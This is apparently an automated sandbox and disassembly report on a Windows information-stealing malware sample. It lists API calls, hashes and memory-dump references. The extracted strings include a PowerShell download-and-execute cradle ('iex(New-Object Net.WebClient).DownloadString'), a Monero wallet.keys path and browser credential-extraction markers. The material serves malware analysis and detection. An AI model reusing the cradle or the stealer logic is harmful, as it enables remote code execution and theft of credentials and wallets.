                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: f9f49109396f8f7fc96239fa06fa8de3d51f4aec50a465a5d4e6443a7a818f82
                              • Instruction ID: f7bbfbf21370e7acbe7af8ece43e098bf5eadc3ff848ccac76edfc9e77fe8c10
                              • Opcode Fuzzy Hash: f9f49109396f8f7fc96239fa06fa8de3d51f4aec50a465a5d4e6443a7a818f82
                              • Instruction Fuzzy Hash: B3F05E30904209EFD3449FE8E90A72C7B74FB14703F044198E609A7390D6B04B42AF96
                              Function 00324FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00324FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00324FD1
                              • InternetOpenA.WININET(00340DDF,00000000,00000000,00000000,00000000), ref: 00324FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00325011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00325041
                              • InternetCloseHandle.WININET(?), ref: 003250B9
                              • InternetCloseHandle.WININET(?), ref: 003250C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 20fb83290d27515c5cb833d465153d4d8f3edb6cf98f5822d08c309222b4d253
                              • Instruction ID: 5223682cd57101545691c4dd22ed5e2af83d50fb82c71c8f2241a132c612044e
                              • Opcode Fuzzy Hash: 20fb83290d27515c5cb833d465153d4d8f3edb6cf98f5822d08c309222b4d253
                              • Instruction Fuzzy Hash: 4931E4B4A40218ABDB24CF54DC85BDCB7B4EB48704F1081D9EA09B7281C7B06A899F99
                              Function 003383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00338426
                              • wsprintfA.USER32 ref: 00338459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0033847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0033848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00338499
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0109E4E8,00000000,000F003F,?,00000400), ref: 003384EC
                              • lstrlen.KERNEL32(?), ref: 00338501
                              • RegQueryValueExA.ADVAPI32(00000000,0109E5D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00340B34), ref: 00338599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00338608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0033861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 22c11f3eb0477ac849e07cde9c83b44e7ab97bc94fdfcb61594909cabbe9f3c3
                              • Instruction ID: 00e7cfee5ee5bdb39d2f389982868581bec1bbaa500c747f09ec9982668bb224
                              • Opcode Fuzzy Hash: 22c11f3eb0477ac849e07cde9c83b44e7ab97bc94fdfcb61594909cabbe9f3c3
                              • Instruction Fuzzy Hash: 1E21E7B1910218ABDB24DF54DC85FE9B7B8FB48700F00C598E649A7140DF75AA85CFD4
                              Function 00337690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003376A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003376AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0108C390,00000000,00020119,00000000), ref: 003376DD
                              • RegQueryValueExA.ADVAPI32(00000000,0109E4A0,00000000,00000000,?,000000FF), ref: 003376FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00337708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 2abe27fd60350da8d667fad436a81ba6b1eb7e6f0df4a243ab54921a44c21888
                              • Instruction ID: 6bfc52a2ee106c065232ad322ec67abf80a6bd8d60ed4ea912c976fd76cc631f
                              • Opcode Fuzzy Hash: 2abe27fd60350da8d667fad436a81ba6b1eb7e6f0df4a243ab54921a44c21888
                              • Instruction Fuzzy Hash: 1F0162B5A04208BBEB10DBE8DD89F7DB7BCEB58701F104454FA05E7291E6B4A908DF51
                              Function 00337720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0033773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0108C390,00000000,00020119,003376B9), ref: 0033775B
                              • RegQueryValueExA.ADVAPI32(003376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0033777A
                              • RegCloseKey.ADVAPI32(003376B9), ref: 00337784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 9073b7f03a7eb4df39f4eb9e1cf855925d54e2dd29f7acaf10c785ffc0e82423
                              • Instruction ID: df0f8750968fcea1f31a13afd118f0013472314c4b35d9abb1a3c6132955def1
                              • Opcode Fuzzy Hash: 9073b7f03a7eb4df39f4eb9e1cf855925d54e2dd29f7acaf10c785ffc0e82423
                              • Instruction Fuzzy Hash: 320117B5A40308BBD710DFE4DC4AFAEB7B8EB54701F104555FA05B7281D7B065449F51
                              Function 003392E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(:3,80000000,00000003,00000000,00000003,00000080,00000000,?,00333AEE,?), ref: 003392FC
                              • GetFileSizeEx.KERNEL32(000000FF,:3), ref: 00339319
                              • CloseHandle.KERNEL32(000000FF), ref: 00339327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :3$:3
                              • API String ID: 1378416451-2957867591
                              • Opcode ID: 4653f0f3955070e16d41d061285699f9c2aee29a36e0234600b2760fa178cf3b
                              • Instruction ID: 4e5b990b781cda50d991b6537404b4272a3909682588a427b482efd3682ed003
                              • Opcode Fuzzy Hash: 4653f0f3955070e16d41d061285699f9c2aee29a36e0234600b2760fa178cf3b
                              • Instruction Fuzzy Hash: BEF08C78E00208FBDB20DBB4DC88B9E77B9EB58320F108254F611A72C0E6B096009F41
                              Function 003299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                              • LocalFree.KERNEL32(0032148F), ref: 00329A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 36a711cd8a139a94331019fb7f99801dda475c719c758b8b60ae6d40c60165ff
                              • Instruction ID: 4f594e4bc28e62a93840b53b1eb26426034b6ca9d699fa0fac3059772b95dc37
                              • Opcode Fuzzy Hash: 36a711cd8a139a94331019fb7f99801dda475c719c758b8b60ae6d40c60165ff
                              • Instruction Fuzzy Hash: C4314BB4A00309EFDB15CF98D885BEE77B9FF48300F108159E901AB290D778AA45DFA1
                              Function 00334780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0109E080), ref: 003347DB
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00334801
                              • lstrcat.KERNEL32(?,?), ref: 00334820
                              • lstrcat.KERNEL32(?,?), ref: 00334834
                              • lstrcat.KERNEL32(?,0108B6F8), ref: 00334847
                              • lstrcat.KERNEL32(?,?), ref: 0033485B
                              • lstrcat.KERNEL32(?,0109DD80), ref: 0033486F
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 00338D90: GetFileAttributesA.KERNEL32(00000000,?,00321B54,?,?,0034564C,?,?,00340E1F), ref: 00338D9F
                                • Part of subcall function 00334570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00334580
                                • Part of subcall function 00334570: RtlAllocateHeap.NTDLL(00000000), ref: 00334587
                                • Part of subcall function 00334570: wsprintfA.USER32 ref: 003345A6
                                • Part of subcall function 00334570: FindFirstFileA.KERNEL32(?,?), ref: 003345BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: f3f2ba30449734142c5d873ecf086890c6b6a487ddd28caaacb3ee26d544da99
                              • Instruction ID: f1c4a69c01705c732102e475f28c61c84d2de64352b808a5b6c2513cc4c3f247
                              • Opcode Fuzzy Hash: f3f2ba30449734142c5d873ecf086890c6b6a487ddd28caaacb3ee26d544da99
                              • Instruction Fuzzy Hash: 913130B690031867CB16FBA0DCC5EED737CAB58700F404589B359AB091EEB4E6898F95
                              Function 00332C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00332D85
                              Strings
                              • <, xrefs: 00332D39
                              • ')", xrefs: 00332CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00332CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00332D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 81c75ad959495d2ff31616ae5a71e73f44759a1bd20c7f7326e264794e4b8212
                              • Instruction ID: a1c6eed00aa33b1c83be493c3f1012d84f66ac6126b5ca623d61e1f83f579cf2
                              • Opcode Fuzzy Hash: 81c75ad959495d2ff31616ae5a71e73f44759a1bd20c7f7326e264794e4b8212
                              • Instruction Fuzzy Hash: 6441AF71D10608AADB1AEFA0C8D2BDDBB74AF14300F504119F156BF191DF746A8ADF92
                              Function 00329E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00329F41
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: e1f4b6b50fc85bdf12e54b098c2a782d13fd99280a656482c1a0fc8d679e0f11
